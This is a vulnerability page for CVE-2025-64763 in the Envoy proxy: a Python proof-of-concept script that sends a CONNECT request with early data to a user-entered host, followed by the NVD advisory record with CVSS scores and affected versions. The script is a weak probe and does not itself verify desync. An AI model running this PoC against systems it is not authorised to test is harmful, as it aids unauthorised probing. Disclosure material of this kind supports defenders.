CVE-2025-64763

#!/usr/bin/env python3 """ CVE-2025-64763 PoC - Envoy CONNECT Early Data Forwarding This PoC demonstrates the vulnerability where Envoy forwards client data before receiving a 2xx response for CONNECT requests. """ import socket import ssl import time def test_envoy_connect_vulnerability(target_host, target_port): """ Test for CVE-2025-64763: Early CONNECT data forwarding The vulnerability allows data to be forwarded before 2xx response, which can cause tunnel state desync when upstream rejects the connection. """ context = ssl.create_default_context() try: with socket.create_connection((target_host, target_port), timeout=10) as sock: with context.wrap_socket(sock, server_hostname=target_host) as ssock: # Send CONNECT request with early data # The vulnerability is that Envoy forwards this data before 2xx connect_request = ( b'CONNECT target.example.com:443 HTTP/1.1\r\n' b'Host: target.example.com:443\r\n' b'Proxy-Authorization: Basic dXNlcjpwYXNz\r\n' b'Content-Length: 100\r\n' b'\r\n' b'EARLY_DATA_BEFORE_2XX_RESPONSE\r\n' ) ssock.sendall(connect_request) # Read response (may be non-2xx from upstream) response = b'' try: while True: chunk = ssock.recv(4096) if not chunk: break response += chunk if b'\r\n\r\n' in response: break except: pass print(f"Response: {response.decode('utf-8', errors='ignore')}") print("If data was forwarded before 2xx, the tunnel state may be desynced") except Exception as e: print(f"Error: {e}") print("This may indicate the vulnerability or network issues") if __name__ == "__main__": # Usage example print("CVE-2025-64763 PoC - Envoy CONNECT Early Data Vulnerability") print("=" * 60) target = input("Enter target host: ") port = int(input("Enter target port [443]: ") or "443") test_envoy_connect_vulnerability(target, port)

{"cve": {"id": "CVE-2025-64763", "sourceIdentifier": "[email protected]", "published": "2025-12-03T18:15:47.037", "lastModified": "2025-12-05T16:52:24.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Envoy is a high-performance edge/middle/service proxy. In 1.33.12, 1.34.10, 1.35.6, 1.36.2, and earlier, when Envoy is configured in TCP proxy mode to handle CONNECT requests, it accepts client data before issuing a 2xx response and forwards that data to the upstream TCP connection. If a forwarding proxy upstream from Envoy then responds with a non-2xx status, this can cause a de-synchronized CONNECT tunnel state. By default Envoy continues to allow early CONNECT data to avoid disrupting existing deployments. The envoy.reloadable_features.reject_early_connect_data runtime flag can be set to reject CONNECT requests that send data before a 2xx response when intermediaries upstream from Envoy may reject establishment of a CONNECT tunnel."}, {"lang": "es", "value": "Envoy es un proxy de borde/intermedio/servicio de alto rendimiento. En las versiones 1.33.12, 1.34.10, 1.35.6, 1.36.2 y anteriores, cuando Envoy está configurado en modo proxy TCP para manejar solicitudes CONNECT, acepta datos del cliente antes de emitir una respuesta 2xx y reenvía esos datos a la conexión TCP ascendente. Si un proxy de reenvío ascendente de Envoy responde con un estado que no es 2xx, esto puede causar un estado de túnel CONNECT desincronizado. Por defecto, Envoy continúa permitiendo datos CONNECT tempranos para evitar interrumpir las implementaciones existentes. El indicador de tiempo de ejecución 'envoy.reloadable_features.reject_early_connect_data' puede configurarse para rechazar solicitudes CONNECT que envían datos antes de una respuesta 2xx cuando los intermediarios ascendentes de Envoy pueden rechazar el establecimiento de un túnel CONNECT."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.33.13", "matchCriteriaId": "B303FFFE-9973-4E7E-8A8C-DE847B725534"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.34.0", "versionEndExcluding": "1.34.11", "matchCriteriaId": "4419A82D-995F-4DD0-BAE1-3825791245D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.35.0", "versionEndExcluding": "1.35.7", "matchCriteriaId": "C50E067C-AE0D-4B14-A442-53603039EFCD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.36.0", "versionEndExcluding": "1.36.3", "matchCriteriaId": "B39C3DF2-E73F-4B66-9504-C24E329ACB54"}]}]}], "references": [{"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-rj35-4m94-77jh", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}